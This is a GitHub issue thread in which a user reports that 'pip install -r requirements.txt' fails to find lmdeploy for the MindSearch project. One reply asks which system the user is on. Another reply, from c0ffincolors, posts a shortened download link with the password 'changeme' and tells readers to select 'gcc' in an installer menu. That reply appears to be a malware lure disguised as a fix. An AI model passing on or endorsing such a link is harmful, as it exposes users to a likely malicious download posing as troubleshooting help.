### ISSUE TITLE
ERROR: No matching distribution found for lmdeploy

### ISSUE THREAD

**Issue by deniswsrosa** [InternLM/MindSearch#181]
I'm getting this error when I try to run pip install -r requirements.txt

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Nuclear6** [comment]
What system are you using? Mac doesn’t seem to match it. I installed Ubuntu successfully.
